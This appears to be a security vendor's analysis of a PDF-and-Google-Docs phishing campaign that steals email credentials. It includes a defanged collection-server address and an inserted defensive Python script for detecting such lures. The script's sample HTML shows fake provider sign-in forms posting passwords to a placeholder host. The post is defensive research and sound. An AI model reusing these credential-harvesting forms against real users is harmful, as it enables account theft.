PDF Phishing campaign uses Google Docs to steal victim's Email credentials

January 8, 2020

SonicWall Capture Labs Threats Research team has discovered an ongoing phishing campaign that abuses a legitimate web-based office suite platform, Google Docs. Upon opening the PDF file, the user is shown a blurred image with instructions on how to view the document:


If the instructions in the PDF file are followed, an HTML file is downloaded from a Google Docs URL without further user intervention, as shown below:


When the downloaded HTML file is opened, the user is shown a genuine-looking web page with options to select an email provider (Yahoo, Google, Outlook, Office, etc.) in order to view the document:


Depending on the email provider chosen by the user, one of the following forms is displayed:


Upon entering credentials and clicking the sign-in button, the user is shown a clean PDF file downloaded from a remote server, so that the process appears legitimate:


However, in the background, the malware author steals the user's credentials when the sign-in button is clicked and sends them to the remote web server “hxxps://webpersonaltrainer[.]top”, as shown below:
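As an added defender-side example (not code from the SonicWall write-up), the following Python script triages a downloaded HTML lure of the kind described above: it parses every form, keeps those with a password field, and flags any that submit credentials to a host outside an allow-list of known provider sign-in hosts. The allow-list is an illustrative assumption, and the sample HTML with its placeholder domain is constructed here for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts where the imitated providers legitimately accept sign-in (assumed, not exhaustive).
LEGIT_SIGNIN_HOSTS = {"accounts.google.com", "login.yahoo.com",
                      "login.live.com", "login.microsoftonline.com"}


class FormCollector(HTMLParser):
    """Record the action URL of every <form> and whether it has a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []      # [{"action": str, "password": bool}, ...]
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html):
    """Return action URLs of password forms that submit outside the allow-list."""
    parser = FormCollector()
    parser.feed(html)
    return [f["action"] for f in parser.forms
            if f["password"]
            and (urlparse(f["action"]).hostname or "") not in LEGIT_SIGNIN_HOSTS]


# Constructed sample mimicking the lure: one sign-in form per provider tab,
# each really posting to the same third-party host (placeholder domain).
SAMPLE_HTML = """
<form id="yahoo" action="https://credential-drop.example/post.php" method="post">
  <input name="email" type="text"><input name="passwd" type="password">
</form>
<form id="google" action="https://credential-drop.example/post.php" method="post">
  <input name="login" type="text"><input name="pw" type="password">
</form>
<form action="https://example.com/search"><input name="q" type="text"></form>
"""

if __name__ == "__main__":
    for url in suspicious_forms(SAMPLE_HTML):
        print("password form posts to untrusted host:", url)
```

A relative `action` is also flagged, since a locally opened HTML attachment has no legitimate sign-in endpoint to post to.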


These PDF files are not detected by any vendor when checked on top threat intelligence sharing portals such as VirusTotal:


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Downloader.FR (Trojan)
  • GAV: Downloader.PD_18 (Trojan)